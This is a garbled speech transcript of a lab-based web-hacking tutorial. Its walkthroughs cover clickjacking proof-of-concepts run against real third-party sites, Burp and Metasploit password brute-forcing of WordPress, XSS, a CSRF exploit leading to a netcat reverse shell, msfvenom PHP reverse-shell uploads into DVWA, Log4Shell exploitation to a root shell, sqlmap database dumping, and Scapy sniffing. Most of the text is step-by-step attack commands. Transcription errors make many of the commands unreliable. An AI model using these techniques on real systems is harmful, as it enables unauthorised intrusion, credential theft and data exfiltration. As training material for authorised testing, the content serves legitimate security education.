remove. I just want to remove here. So you just type clear. So just type list. So you can install here pip3 install minus r requirements.txt. So it will install the requirements. So does not matter if you get any error, so don't get panic. So you just type here nano domains.txt. So I would like to write a another targeted website. Here is I would like to write as packschool.com. So you just type control O, control X. So you just type cat domains.txt. So you just type here Python 3 minus so Python 3 click jack poc dot Python. So here is clickjack.python. So now it shows clickjack.python minus f is a file. So you just need to specify in the file minus f domains.txt. Okay, so I just need to change the domains is okay. I noted enter packschool.com. That's it. Control O, Control X. Just type here cat domains.txt. Yes. So now just type here uses please retry and try minus minus help. So it's not working about that one. So I would like to try with so you just type here nano domains.txt. So I just write here try hackme.com and I just type here hack app.hacking hub.io. Then I just type here uh, hackthebox.com. Sorry, hackthebox.com. Then you just type Control O, Control X. Now you just type here domains.txt. So now it was successfully generated. Generating a tryhackme.html.poc, generating a app.hacking.iot. So now you would like to look at these three results. So now I just come back here, open new tab. So where is so I just want to delete this too. I just want to move to trash. So now I got it here, click jack POC. So now we would like to look this 3-1. So we would like to look open with the Firefox. I also open with the Firefox. This one. So now let it load this one. Now you can see here. So it take a little bit time to load this one. So come back here. So open with Firefox. Now. So let's see here. So here you can see here the clickjacking of the targeted website. As an image is captured, you can look browse here everything. Now you can see here hacking hub, search a filter everything. So you can access entire of the targeted website here from here. So it's like a clickjacking POC attack. So if you do this one in any one of the targeted website, uh, they're gonna pay you some bounty. That's it. So you can see here the try hack, everything I can see here, join free. So I can get it like a mobile access here from a clickjacking pills. Now we can look this one. It's also a try hack me. It's okay. I would like to look here. Hackthebox.com. This one I would like to open. So this is how you can perform a clickjacking. So now we would like to go for another targeted tutorial is number 7. So you just type here perform a brute force attack using Websuit. So Websuit is an integrated platform for performing a security testing of web application. It has various tools that works together to support the entire testing process from initial mapping and analysis of application attack surface to finding the exploiting security vulnerabilities. Websuit contains a key components such as intercepting proxies, application aware, spider advanced web application scanner, introducer tool, and repeater tool and sequencer tool. So we would like to uh, look here. So now we can look here. So the clickjacking, everything is possible here. Hack the box. So now you just close this and this also. Uh, Open new tab here. Close this. So now I come back here. So now I can look here. My targeted WordPress website here is available. So I hosted this WordPress website in one of the VMware. So we would like to visit directly here HTTP wordy. So before that one, I would like to go as manually for you to come back here. So you just type cd, just type clear. So you just type here directory buster. So we have already done this directory buster about all those things. So we don't need. So we directly jump into HTTP wordy at WP admin. So we go directly to a WP admin. So I know the username as, so you type cat users.txt. So I know the username as Mark. So I just need to consider as Mark. So I would like to go here, type as Mark. So I don't know the password. So I just enter as Alex. So before that, I would like to start a purpose. So just type here purpose. So to getting all those usernames, so just type here wp scan minus minus URL and enter the targeted website. You just type OK. HTTP, enter the targeted IP. Oops. Wordy. Open this pops out. So just click on next, next. So we just close this. So we just enumerate the username. So it will enumerate the username so that I just stored all the usernames is here. So let it scan first pub suit. Let it open this one. So before opening the pub suit, you just click on new tab, go to your settings. Then you specify, go to your network settings. Then click on the settings. Then click on manual proxy configuration. Then click on OK. Then click on pub suit. Now you just no need to do anything else. So now just come back here. So click on proxy. Then click on intercept is on. So now you just open this wording. So you just click on login. So you got it all the information here. So you just click on right click, send to an introducer. So you have here introducer. So once you look here, pwd equal to, so you just need to add a payload here. Then at the end of Alex, so you just need to add a payload like this. Then we just click on payloads, load a password list. So I already generated a password list here, passwords.txt. Just click on open. Then click on start attack. So it will start for attacking. Now you can look here. So what else you got as 302? That's the right password. So I would like to come back here. So I already look here. Admin, Mark, Search, Sarah, Jens. So I already make as an username. So no need to worry about this one. So you just type here. It's also used type. So now I would like to show you here as you just make it as big. So you just make it as length. So once you get as help desk, so you can look here response. So in render you cannot able to get here. So this is directly go once you enter with this password. Okay, username as Mark, going with this. That's it. So now we would like to close this. So the password is helpdesk01. Discard it. Go to your proxy. You just off this. So now you can crack this one like this. So you just type here helpdesk01. Just log in. So you have successfully logged into a WordPress website. So you just okay. So now you can see here we have successfully logged into a WordPress website. Now so this is how you can crack the WordPress. So now we are going to do as a parameter tampering using a pub suit. So I just need to click on logout. So now we would like to come back here. So now another targeted tutorial is perform parameter tampering using pub suit. So a web parameter tampering attack involves in the manipulation of parameters exchanged between a client and server to modify application and data such as user credentials, permission, price and quantity and products. So now we would like to look here. Now first we would like to open a terminal. So first we would like to go to test.php.monoweb. So we would like to do here parameter tampering. So first we would like to click on the sign up. So we would like to explore everything clearly here. So you just log in first as username as test, password as test. Then you just click on login. Once you log in here, so you can look here artist. So click on the first one. So here have artists. So you just click on settings. Again go to settings. Click on manual proxy configuration. Click on OK. Come back here. So click on web sort. So now you just come back here. Click on this. So you just intercept is on. You just click on again. So you just refresh this one. So you got it here. So we would like to send to an repeater. So now go to an repeater. Now you just need to change only the parameter ID. That's it. So you would like to look here. Once you send the parameter ID, so you got a render here. You can look with the render. What exactly? Let it load first. Waiting for the image. So now you can look here. Artist R4 W8173. Now you can look here the same thing we have got it here, artist. So now you would like to change as a parameter as 2, then click on send. You can look here, the parameter number 2 is BLAT3. So based on in the real-time scenario, you just need to get the parameter identity. So you need to find the vulnerability. Okay, then and only you can change this one. Then you can collect all the information. So you can see here artist 3. So when you go for Facebook, when you log in with a client identity, then you can change the Facebook profile ID. And you can also dump their passwords also like this. So this is how you can change the parameter ID. So identify XSS vulnerabilities in web application using PWN XSS. So now I'm just closing this. Power off. Go back here. Settings. So you just disable this one. So now I just come back here. So I already have PWN access. So we just type here clear. So I already get it from the GitHub. So you just type here PWN access. Enter. You just type plus. So you just install the requirements. So you just type pip3 install -r requirements.txt. So, PWN XSS is an open source XSS scanner that is used to detect a cross-site scripting vulnerabilities in website. It is an multiprocessing and customizable tool written in Python language. So you can add choices your wish or your uh, uh, XSS payloads into this script. So you just type here sudo su and enter the password. So you just type clear. So you just type here Python 3 pwn access.python. That's it. You just enter. So you just need to enter the targeted URL first. So we just need to enter with the targeted URL only. -u test.php. That's it. So this will identify the parameters. So you can look all the parameters one by one. So you just click on copy link, come back here, open new tab, and you just paste it. So you can look here parameter. So what is there? They put 25. You just put it 25. It's game. So that it was exploiting parameter. So you need to find, otherwise discover yourself as like writing a script tags. Otherwise any type of targeted HTML tags, otherwise here. So in the targeted website, script prompt by 5000 by 200, close the script tag. So you can identify here, have multiple here. So just open new tab. You can look here in another targeted website. So warning, MySQL fetch array. Accept a parameter 1 resource, a boolean given like hj where www.artist.php in line 62. So this is going to be coming for an exploration. That's it. So you can explore furthermore. So now we would like to go for another tutorial number 9. Exploit parameter tampering and access vulnerability in web application. So parameter tampering is a simple form attack aimed at directly by an application or business logic. A parameter tampering attack exploits the vulnerabilities in integrity and logic validation mechanism that may result in excesses or SQL injection exploitation. Excesses attacks exploit vulnerabilities in dynamically generated by web pages, which enables a malicious attacker to inject client-side script into a web pages viewed by other users. Attacker inject a malicious JavaScript or WP script, active HTML or otherwise a flash code or execution on a victim system or hiding in written legitimate request. Although an implementation is script application, security routine parameter and input validation can minimize a parameter tampering and excesses vulnerabilities. Many websites and web applications are still vulnerable. These security threats. Attacking a web application through a parameter tampering and excesses vulnerabilities is one of the steps an attacker takes in attempting to compromise a web security application. Security. An expert ethical hacker and penetration tester should be aware of these different parameter tampering and excesses methods that can be employed by attacker to hack a web applications. So here, I don't want to delete all those things. So we would like to look, these are for excesses vulnerabilities. Okay. So, and now parameter tampering like uh, in artist, like here is an artist equal to 1. You can look here, artist 1, and I would like to look here, artist 2. You got it, artist 2. So when you look for artist 3, you got it, the artist 3. So parameter tampering will be the access vulnerabilities will be exploited from even the contact page also. No worries. So comment on this artist. So it will open in one of the blank page. I would like to copy this one. So here I would like to enter as a name. So I just enter my name as I would like to enter this here Alex. Now you just enter as a script tag. Script and you just type here as alert and you just type here you are hacked. Then you just type here script. Then close the script. Then click on submit. Thank you. So I just come back here, PHP and AID equal to 3. So once you look here, underscore AID equal to 3. So it's not coming. So you need to do it by manually here. So what is this? So you need to do it by manually by using this targeted. Like, so just open the link here. So this is an X parameter tag. So once another client also can come and see also this type of vulnerabilities. So that will be present on the targeted website. So until unless if you can't able to change, it will not go anywhere else. So now come back here, close this. 10. So we are going to perform a cross-site request forgery attack. So just type here. Perform cross-site request forgery attack. CSRF, also known as one-click attack, occurs when a hacker instructs a user's web browser to send a request to the vulnerable website through a malicious website. Financial website commonly contains a CSRF vulnerabilities. Usually outside attackers cannot access a corporate intrants. So CSRF is the one of the method used to enter these networks. The inability of web applications to differentiate a request made using a malicious code from a genuine request expose it to the CSRF attack. These attacks exploit a web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests that they did not intend. So now you would like to look here. So we already know our targeted website as wordy / WP admin. So I'll come back here. Start cat start. So the username is Mark. So we know already username is Mark. Now I would like to know here the password is helpdesk01, which we was cracked through in a bub suit. So this here. So we have here activity monitor. So now we would like to find an exploit. So you just type clear. So you just type here such exploit minus WordPress activity monitor. So I have activity monitor here. So I would like to use an HTML code. So you just type here again such exploit minus m 45274.html. Now I just type here cat 45274.html. Now you can look here. You just need to change only your targeted website. That's it. So you don't need to change anything else, and you need to remove this NVLP and you need to replace with localhost to targeted your Kali Linux IP address. That's it. So you just come back here. Just type here. Just type set. Type here. Type here. So now you just type here clear. You just type here mousepad and 45274.html. Now we would like to look this one, open this one. So you just need to remove this target role. So you just need to carefully remove this one. Don't make any mistake. If you make mistake, you are in a, you can't able to get the targeted target. So you just type here 192.168.18.26. Then in the local host, you just need to come back here. You just type here as wording. That's it. Then you just click on save. Then you just come back here. Now you just type here cat. We would like to look here. HTTPS wordy wp admin.php page plain activity monitor activity tools method equal to first encrypted multi-part form data. So you just type clear. You just type here netcat minus lbnp 9999 the port which there is available. So now you just need to click on this, open a folder. Now I would like to look here. Where is this? I just want to do this. So I just need to open to an Firefox here. So you just click on submit a request. So you have successfully connected here of the targeted website. So you just type ID, you got it here. So now you would like to further, you need to go here as who am I? It's come www data. So you just type again which Python, you got it here. So you just type here Python -c import pdy span bin bash. So you have successfully got it. So you just type here cd home. You just type list -l. You just type cd mark. Now you just type list -l. Now you just type cd stuff list -l. List -l. So you just type cat things to do .txt. So we got here graph. So if you want to exploit fully up this one, so I can show you here. So you need to flow. If you are regularly flowing my my YouTube channel, you can get to know how I am exploiting. So just type sh, enter the username as Garam, copy this one, enter the targeted IP address 18.13, password. So just copy, come back here, paste it. So you just type ID, we got it. So you just type list -l. Now you just type here cd home list -l, cd gens list -l. So now you just type here sudo -l. So here we got it home Jenny's backup.sh. So for that you just type here sudo -u for username for gens. Then you just copy this one, copy, paste. So it does not come to agents now. So yes, type ID again. So it not come to agents. So we are in wrong way. So it's not taking much time. So I'm just putting here. So you can do, if you want, you can flow my YouTube. You can learn about this one, how to go. So as of cracking or doing this tutorial only, I just taken this one as a cross-site request forgery. So now we would like to go for as I just type here exit. So I don't want to go further. So now our next tutorial is 11. You just type here enumerate and hack a web application using WP scan and Metasploit. So the Metasploit framework is a penetration testing toolkit, exploit development platform and research tool including hundreds of working remote exploit of variety of platforms. It helps pen testers to verify vulnerabilities and manage a security assessment. In this task, we will perform a multiple task of vulnerable PHP website of WordPress. In the attempt of to gain a sensitive information such as usernames, passwords, you will also learn how to use a WP scan tool to enumerate usernames on the WordPress website and how to crack a password by performing a dictionary attack and using a MSF auxiliary module. So now you would like to look here. So first, I would like to make it somewhat big. So just type here WP scan. So first, I would like to get it. I close this. Come back here. So you type here WP scan. So I already have here an account. So I want to, so it shows for again login. So we are going to log in again. So I'm just entering my email address and I just enter the password. So I got it an API key. So you need to create an one account, and if you want to upgrade, daily API request limit is 25. So now we would like to look here API stat minus minus API token. So you need to use an API token is mandatory for some of the critical targeted website, and you specify the URL and you enter the targeted IP address is wording. You just type here enumerate usernames and plugins. So I'm enumerating the username and plugins. Oh, sorry. So you need to carefully enter. So I'm going a little bit fast. API token. So it will also enumerate the CVE ID. So you can use that CVE ID to exploit it. So you can see here you already successfully got it, the all username. So I already marked the username. So I already have the password. WP scan database API is okay, planned for free. Request done during the scan 2 and request remaining is 21. Okay, no worries. So we don't care. Now we would like to go for try for MSF console. So just type here MSF console. So now MSF console will start. So now MSF console is here. Now we would like to look here. Let it open. So it's take a bit time to come. So I just type here search WP login in. Oh, sorry. So just type here again search WordPress login in. It's available. So you just type use 0. So you just type here show options. So you just type here first set our host. Our hostess, set our hostess, enter the target. Oh, so first I would like to enter the HTTP wording and set our port equal to 80. Then you just type set password 5. So you need to give from your local machine home Pentester Club and you just type here as passwords.txt. So for password.txt, so I just need to look here cat passwords.txt. That's better. Now we would like to look here. This was done. Set user file. Just type here home Pentester Club user users.txt. That's it. So you just type here run. So it will start now running. So now you would like to look here users found. So that will found. Now you can look here successful login WordPress bullet force successful login mark and help desk. So this is how you can perform with WP enumeration of cracking the passwords. So now we would like to go for you just type here exit, you just type clear. So we have successfully done this one. So you just type here also clear. So now we would like to go for another tool is so now you just type here exploit a remote code execution vulnerability to compromise a target. So now you just come back here. So I would like to close this also. So first of all, I just need to delete here entire of the history. So everything is type sites offline sites. So let it clear. So now we would like to open new tab. Now come back here. So you just type here 127.0.0.1. So damn vulnerable web is a PHP or MySQL web application that extremely vulnerable the main objective of DVWA. It's aimed for security professionals in testing their skills and tools, a legal environment to help web developers better to understand the process of securing a web applications and aid teachers or students in teaching or learning web application security in classroom environment. So now we would like to do this one. So if you install through a Docker, you can look my previous tutorial. How should I can install with a Docker? We just type here. Username is admin, password is password. Then you can log in. So first you just need to look here. That's better. So first click on the command injection. So enter the IP address is 192.168.18. And I would like to get like 27 for Ubuntu. Then click on submit. So I got a ping reply. Now I would like to look now as an host name. What is the host name? I would like to type here and you just type here host name, and you just click on submit. So the host name is got as a reply here. So now I would like to go for. So I want to know what does the task list is running event to. No, it's not okay. So if you want to kill any type of task in event 2, you just type here the targeted IP address, you just type here task kill. So we need to go for sorry, task list. So it's not gone. So if you want to kill any type of task kill, you once the list is processed came here. So you enter the processor ID and the ID name like 45508, 4558, then and you just type -F, then it will kill the processor ID. That's it. And if you want to go for any type of directories, you just type here directory, then you just type here uh, home. You would like to look here. No, I not it yet. So I would like to type here directory as home PCP here. Then we'll see. So here it's not coming. So it may be work only on Windows based machines. So I would like to type as an net user. So I'm not getting any useful request from my event machine. So you try to on this one to get successful. Now we would like to go for another tutorial. Starting. Exploit a file upload vulnerability at different security level. So, Metasploit framework is a tool for developing and executing exploit code against a remote targeted machine. It's a Ruby-based modular penetration testing platform that enables you to write and test and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate a network, execute attacks, and evade a detection metapattern. It is a Metasploit attack payload that provides an interactive shell that can be used to explore the target machine and execute the code. So now we would like to come back here. Open our kernel Linux. So we would like to come back our home machine. Okay. So now we would like to open our home directory. So better we just type here MSF console. So let it load. This one first we just type. I would like to make a directory dvwa. Now you just go to cd dvwa. Now you just type clear. You just type list. So you just type clear. So you just type here now msf vinum minus payload for php meter and you just type here reverse underscore TCP and you just type here lhost equal to 192.168.18.26 L port 1234. Then you just type minus F and run. That's it. So the PHP of run will be presented here. So now let's see. So entirely just copy this run. So you just type here mousepad. Now you just type here as upload one.php. So I just need to get, so I don't need to enter as upload one.php. I just don't like to want to save. Let's type list. Okay, let's put here. Okay, so you just need to type a mousepad log.php. Paste it. Then click on save. Then come back here. So now come back here. So you can use here use exploit multi handler. So you just need to use here copy this, set payload, enter the targeted payload, set rpost, enter the targeted IP address 18.26, set set lhost, enter the targeted IP address 192.168.18.26, set L port 1234 and just type here as an exploit. Now just come back here. Before here, come back here. So you just type here list load.php. So now we would like to click on file upload. So now I would like to show you here is something. Our DBWA security is in low. It's in low. I would like to submit. This security levels completely vulnerable, has no security measures at all. Okay. Now you would like to look here, file upload. Click on browse. Now go to home. You just click on DBWA, load.php, click on open, click on upload. So file is uploaded. Now just come back here. You just enter the targeted IP address. You just type here hackable. So otherwise, I just need to copy this one, load.php. Just copy this one, come back here. So first I would like to look here. It was started. So before that, after I creating this one, I just started MSF console. Then I just exploited this one. Now you just look here. Open this. Paste it here. Then so it will start for running. So now you have successfully got the Peter session. So you just type here sysinfo. We got it here. So you just type here exit minus y. Same here exit minus y. So you just type here clear. So we have completed low level security. Now we would like to go for high level security. So now I just come back here, click on DBWA security. Now I would like to go for now medium level security. Now come back here. So here So you just type again MSF console. So now you just type here as MSF Venom. So it will generate, oh sorry, I just need to quit here. So I just need to change the port as 456 5678. So I just change the port and enter. So now here the payload will be generated here. Now let's wait. So once you go for MSF Venom, so you just type here, same as it is, use exploit multi handler. Now you just type here as use, oh sorry, set payload. You would like to use this word PHP reverse underscore TCP. Just copy this word, come back here, paste it. So before this one, we would like to go back here. We just need to entirely copy this one. Just copy. Now we would like to look here. Just entirely just copy this one. Now just type here mousepad medium dot php dot jpg. That's it. Then you just paste it. Then click on save. Then you just close this. So now we would like to come back here, open this as settings. So you just type here network settings. Then click on manual proxy configuration, click on OK. Now you just open the pub suite. So before we doing, so we just complete this one. So we just type here set lhost 192.168.18.26. and you just type here set L port equal to 5678. So the L port is 5678. Okay. And you just type run. So it was listening now the TCP handler. So before that, we would like to click on intercept is on. Now we would like to go to our website. You would like to go for file inclusion. So I just off this one for first. So file upload. So now we just switch on right. Yes, click on browse a file. So medium.jpg. So you just open this one. Now you just click on this. Intercept is on. Now you would like to click on upload. So now here you can see a medium php.jpg. So for this, we would like to remove that jpg here. Now we just click on forward. Now you can look here, file uploaded successfully. Now we would like to click on this network settings, use the system proxy configuration. Now just come back here also, just disable this, come back here. So you can see here it was started. So now you just need to enter HTTP, enter 127.0, hackable, uploads. Now we would like to go here, medium.php. So we have successfully got the reversal here. So just type here sysinfo. So we have hack the medium level of security also. So you just type here exit. So you just type exit minus y. So you just type clear. So again you just type here MSF console. So now you just type here clear. So you just need to come for high level now. So for high, I just use 7890. Then just come back here. So the payload is generated. Now we would like to look for. So now entirely just copy this one. You just copy this one. You just type here mousepad hi dot jpeg. Now you just type here give 98 and you just paste it entirely this one. You just close this, save and close this. So now come back here, close this, open. Now go to as a DVW security. So from here, medium to you just put for high. So in this high, harder or alternative bad practice. So you just need very bad practice for this. So you would like to come back here. We have saved this one. So we have saved successfully. Now we would like to go to the targeted file upload. So you just click on browse a file. So it's a hi.jpg. So just click on open. So now what you would like to do here is again you just need to click on network settings. Now just click on manual proxy configuration, then click on OK. After that, now we would like to look open the here as a verb suite. Now we would like to what we would like to do here is so we just click so we just need to start the verb suite. Intercept is on OK. So click on upload. So here is hi.jpg. So you just click on forward. So you can see here hackable upload.hi.jpg successfully uploaded. Now our target is we need to close this. Intercept is off. Now what we would like to do here is this verb suite is also is off this. Come back here first. Is system proxy configuration. Now we would like to come back this one. Where is this? So we would like to disable now. So this is for high security. So we cannot able to execute. as this one. So we would like to click on command injection. So now we need to enter the targeted IP address uh, is so first we would like to enter. So we would like to enter the targeted IP address 127.0.0.1. Then you just enter as copy from enter the targeted location. From the targeted location is like you just need to enter the targeted location of 127 dot so you just need to enter http, enter the targeted location 127.0.0.1 to then forward slash hackable uploads then forward slash hi.jpej. Then you need to send the same thing, copy as http what else in have hi.jpg. So you just need to enter the same thing, http 0.1 forward slash hackable uploads to shell.php. Then click on submit. So I noted setup as a listener. So we would like to look here. So it's not a copy, it's just ping the IP address. That's it. So we would like to go for hackables. So first I would like to set up use exploit multi handler. Now just type here set payload I just type here set lhost, enter the targeted IP address 18.26, set el port equal to 7890, and you just type here run. Now we would like to look here hackable, then you just type here uploads. Now I would like to type here hi.jpej, then click on run. So the image file cannot be displayed because it contains error. Okay. So how we would like to go here is, so our target is like so for copying this one, so we would like to look here, enter the targeted IP address 192.68.18.26, and you just type copy from enter the localhost only 0.0.1, and you just type here copy. So in here I would like to remove the better as http Then I would like to go with now. I just click now submit. Now let's see. So it's coming as same thing. So it's impossible to do this work. Copying in this a ping device of the IP address. So if it for a Windows, so that will be done very easily. So in the Linux, it's very complicated task. So where it was stored, we prefer not to say, and where it was stored in this one, I can't able to look. So this is like complicated task to get it. So better we would like to look here. No. So you tried this one, guys. So we would like to move for another tutorial is for gaining access by exploiting a log4j vulnerability. Wait, start clear. So just right here. Gain access by exploiting log4j vulnerability. So log4j is an open source framework that helps a developer to store various type of logs produced by users. Log4j, which is also known as log4j shell and logjam, is a zero-day remote code execution vulnerability. Tracked under CVE 2021-44228, Log4j enables insecure JNDI lookups when these JNDI lookups are failed, when the LDAP protocol can be exploited to exfiltrate the data and execute the arbitrary code. So we would like to now open our event machine. You just type enter the password. Now we would like to type here open at. So now let's we come back for installing the log4j. So I already installed the log4j. So you just type here cd log4j shell poc. Now you just type here list. So here have everything. So now you just type here. If you want to install the log4j, so you just type here as docker build -t log4j shell poc dot. So it will, so you just type so and enter your password. So you just need to copy and paste this one. So we have installed. So now you just for running, you just type here docker run -- network host log4j shell poc. So it will run the docker now. So I already running my docker here. So now you'd like to look here, this hosted in the docker. So once it was running, so you just quit this. Okay, it was quit automatically. So you just type exit here, you just type clear. So now just go to cd downloads. Sorry, cd downloads. You just type list. So you just type remove minus. So here I just downloaded this JDK 8U202 Linux x64 tires UZ. So I just get it from this targeted URL. So I already made this log4j tutorial, so you can look it out here. So this targeted one, I got it here. Okay, I downloaded this one, then come back to here. So I just tell here, you just type tar minus xpf and enter this one. Just copy and paste it. So if you enter, it will extract all the information. Just move this one. So you just type sudo move this one jdk 1.8.0 underscore 202 forward to user bin. So I already copied that one there. So that's already have there. So now you just type cd, you just type click. So now you just type cd log4j shell POC. Now you just type list here. So I want to modify this one. So you just type here edit poc.python. So in the first place, I just modified to user bin JDK 1.8.0 underscore 202. That's it. So I also modified here like the same in 87 the three places Java. So at the 99 place. So in the three places I was modified with the 20. That's it. So you just click on save, then you just close this one. So now if you want to run this, okay, now you would like to type here first, open new tab, you just type here, you just type here netcat minus lvmp. Nine double zero one. So now you would like to do here is you just type here python 3 poc.python minus user IP is enter the targeted IP address 192.168.18.27 and you just type here web port is 8000 and you just type here minus el port equal to 9001. That's it. So now it will generate as a payload. So you just need to set in the targeted website of this one. You just need to copy this one, open the here, so paste it in the username place. So here you just need to enter the password as choice is your wish. You just enter anything, you just log in. So now we would like to look here as a netcat. Oh, I not yet set up as a netcat listener. Oh, sorry. So you just set up netcat listener 901. The password you have entered will be an information. So now you just look here. You have connection received from the targeted. So you just type ID, you got it here. Directly as a root. So you just type here which Python. You not get it. Again, you just type here which Python 3. You're not getting. You just type who am I? You're getting list. So all the information is available here. So you just type here cat running.txt. So what else it was running? It's presented here. So you just type here quit. So this is how we can perform. So we have completed this web application, hacking web application. So now we are going for another tutorial is another topic for SQL injection. So close the window here also. Let's quit this or better. So when you come to an SQL injection, okay, just type here SQL injection. So, what is SQL injection? SQL injection is a common vector attack that allows an attacker to interface with the queries that an application makes to its database. It can enable an attacker to view a data that they are not normally able to retrieve or even execute administrative operations on the database. Here is an in-depth look we would like to look here as an in-depth. Like what type of SQL injections we would like to look here. Classic SQL, blind SQL injection, error-based SQL injection, union-based SQL injection, time-based SQL injection. So we are going to perform. Yeah. So we also perform like a parameterized queries and stored procedure, input validation, escaping, least privilege, web application firewall, error handling, and regular security audit. So now we would like to go for here. So our first task is number one. So perform an SQL injection attack on mass SQL database. So Microsoft SQL Server is also known as mass SQL Server. Structured query language. Oh, sorry. So mass SQL defines as Microsoft SQL Server is related a database management system developed by Microsoft. A database server, it is a software or a product with a primary function of storing and retrieving a data as requested by other software application, which may run either on same computer or on another computer across the network. So an SQL injection query exploits a normal execution of SQL statement. If it involves a submitting a request with malicious values that will execute normally, but the return of the data from the database that you want, you can inject these malicious values in the queries because of application's inability to filter them before processing. If the values are submitted by user are not properly validated by an application, it's potentially target for SQL injection. So now we would like to look this one first. I would like to open here. You just type here test php.vulnerweb.com. So you just click for sign up. So you just need to enter as as a query. So I just clicking for you big. So you just type here blah. Or 1 equal to 1 minus minus. So you just entirely just copy this one and you just paste it here. So you just log in. So you can see here my SQL connection was refused in like, so there is an SQL injection will be performed here. So this is how you can exploit it here. So you can use any one of the targeted websites using like admin with or 1 equal to 1 minus minus and 1 equal to 1 and it will become also a 0. So then it will be work out for SQL injection. Now we would like to look for another tutorial. So sometimes you can log in already directly here. That's it. So number 2 is back here. Perform an SQL injection attack against Microsoft SQL to extract database using SQL map. So SQL map is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server. It comes with a powerful detection engine, many niche features, and broad range of switches from the database and fingerprinting and data fetching from the database to accessing underlying file system and executing a command and OS via outbound connections. You can use a SQL map to perform SQL injection on the targeted website using various techniques, including like Boolean-based, blind, time-based, error-based, union query-based, stack queries, and choices your wish. So you can define however you want. So now I want to do it here as another way. So you just type here as a test and password is also test. You just log in here, test, click on OK. So it's coming as an error. It's okay, no worries. So you just click on our test. Now you just click on any one of the here. So you just entirely just copy this one. So here sometimes you would like to look by inspect the elements. You just type here as console. You just type here document dot okay. So here we not yet get any type of document. So we would like to exploit directly this one. Okay. So sometimes if you get a cookie caches, you can use that also. It's more helpful. So now you would like to come back here. You just type here SQL map minus minus help. You can look here as an SQL map. So the SQL map is presented here. So now you just type here. You just type here clear. So you just type here SQL map minus u defines the username. You just enter the targeted website and you just enter minus minus dbs. So it will entirely drag the database. So now let's see. Type yes, yes. So I forget to provide minus minus batch. So that will, you don't need to stress every time to enter like yes, yes, yes. Okay. So again. So we have got all the information, like we have two tables like accurate database and information schema. So I would like to go for here. I would like to specify the database as accurate minus minus tables batch. So I would like to dump all the information. Now you would like to look here. So you can look here in the tables. So I would like to go for in the tables as users. Table users columns batch dump all. So I would like to dump all the information. So once again I have enter. a mistake. We have enter as a mistake. So, yeah, nms minus batch dump all. Let's see. Batch dump all. So again, it was giving an error. So we would like to look here once again. So okay, so I just not need to mention as I would like to first dump the data. That's it. So this will dump entire of the data. Yes. Default directory. Then you just type yes. So it will take little bit time. So we would like to wait for here. So let's see. So before it's coming, we would like to look for another thing. So you can extract all the information. So you just need to go by step. That's it. So our next task is detect SQL injection vulnerability using DSS. Here, detect SQL injection vulnerabilities using DSS. So damage small SQLi scanner is a fully functional SQL injection vulnerability scanner that supports get and post parameter. DSS scans web applications in various SQL injection vulnerabilities. So we would like to start now this one. So first I would like to open as Firefox. Just open here DSS GitHub. Diamond small SQL scanner. So we would like to get this. So you just need to copy this one, come back here. So until it will crack, now we would like to come back here. We would like to look this. So you just type here git clone and paste the repository. cd dss. You just type list. So you just type here Python 3 dss dot Python. So here we got it. So you just need to use as an URL, and you just need to use the targeted URL as I would like to use as http test.php. So test.php dot vulnerweb.com. That's it. Now we would like to look. So no module post parameters is found. Okay. Now I would like to put only the targeted website as vulnerweb.com. So it will not getting any type of parameters. So no usable parameters or no vulnerabilities found. So better I would like to come back here. copy this entirely. I just paste it here. Just paste it. Now, getting parameter for artist and up here. So it's an vulnerable here. You can look here. The parameter blind SQL is vulnerable. So this is how you can get it here. So it will take a long lengthy time process. So you just need to wait with the patience to get it here. So now our next tutorial is open this. So detect a SQL injection vulnerabilities using OWASP Java. So OWASP attack proxy is an integrated penetration testing tool for finding vulnerabilities in web application. It offers automated scanners and set of tools that allows you to find a security vulnerabilities manually. It is designed to use by people with a wide range of security experience. And as such as ideal developer and functional tester who are new for penetration testing. That's our helpful. So we have done before multiple times opening this one. So where it not even open this one. So now it's starting. So now let's see. So while go and cracking for this one is taken long and lengthy time process. So it's taking too long, lengthy time process. So now let's see where we can get it this one. So we are going to scan now another new targeted website here to find an SQL vulnerability. Like look here. So you just click on. So click on automated scan. So you just enter the targeted IP address. You just type enter the vulnerweb.com. Then you just click on start attack. Now again look here. Security test. Content security policy. So here you can get like SQL injection here. That's it. Like look here until this. So while cracking, it will take a lot of lengthy time process. Like to look here, this one. So once you look in alerts, you can look here, content policy. So vulnerable, you can look here, hi, CVID 693, passive, content security policy or header not set. So the description is also provided here. So I don't want to edit anything. I would like to close this. So this is how we can perform this one. So now we would like to go for our another targeted tool is number 15, hacking wireless networks. So now we are discussing about hacking a wireless network. In ethical hacking, gaining access of wireless network is done with explicit permission of the network. Owner identify and rectify security vulnerabilities. So we would like to do here like a wireless network penetration testing. So our first tool is Scapy. So what is a Scapy? Scapy is an Python-based interactive packet manipulation program and library. So we would like to go here. So Scapy. So it is able to forge and decode packets of wide range number of protocols and send them a wide capture them and store and read them using a PCAP files and match a request and reply and much more. It designed to allow a fast packet prototyping by using a default values of the work. So now we are going to do this one. Let's come back here. So just open the terminal, just make it as big, just type here remove. Oh, so I just need to remove. So just type clear. So again, we would like to open the terminal. So you just type here sudo su and now you just need to enter or the password. So you just type here Scapy. So once you come to a Scapy, you just type ISC, you just enter here. So here we got it name as ISC, it's not defined, does not matter. So now just come back to a Wireshark, open the Wireshark. So now before we are writing as command, so just type here clear. So just type here. I would like to send IP request from here. So I would like to write something here. Send IP from source of the targeted IP address. So from my Kali Linux and destination of my router, and I would like to send ICMP as a ping request, and that will be need to a reply of the from the host. So I would like to write here PCPL Alex subscribe. So before I am sending the data here, so I just open a Wireshark and just write it 0. Now it was started here. Now you just type enter. So here packet is sent. Now you would like to look, you just stop here. Now you would like to look here. Here ICMP a ping request. You can look here ICMP ping request Internet Control Protocol message and you can look in the data. So the data here. So the data here allow PCP like subscribe. So you have got here. So now you would like to as a reply. So the reply is you can look here. They got an a reply also here. That's it. So now we would like to go here. So I would like to snip the data from my targeted IP address. So just type here snip. I just type here iface equal to each 0. So I would like to mention as each 0. Now PRN equal to lambda. So I would like to specify as a source and you just type here summary and you just close this IPS and then you just enter. So there is an error. So come back here. So we would like to give as a space prn lambda space again as an syntax error. Okay, dot summary we would like to enter. So now let's see. So now it was sniffing all the data. You can look here every information about the packet. 20 from the destination IP address. You can look. You can look. It's keep on sniffing all the information. 45 and the real targeted IP address. You can look here. It's go for UDP, ARP. Every information it's going to sniffing. So now I would like to stop this. So now I would like to look how I can flood using this one. So we have done all the sniffing here. Now we would like to go back here, come back. So now just type here clear. So now what we would like to do here is we just type 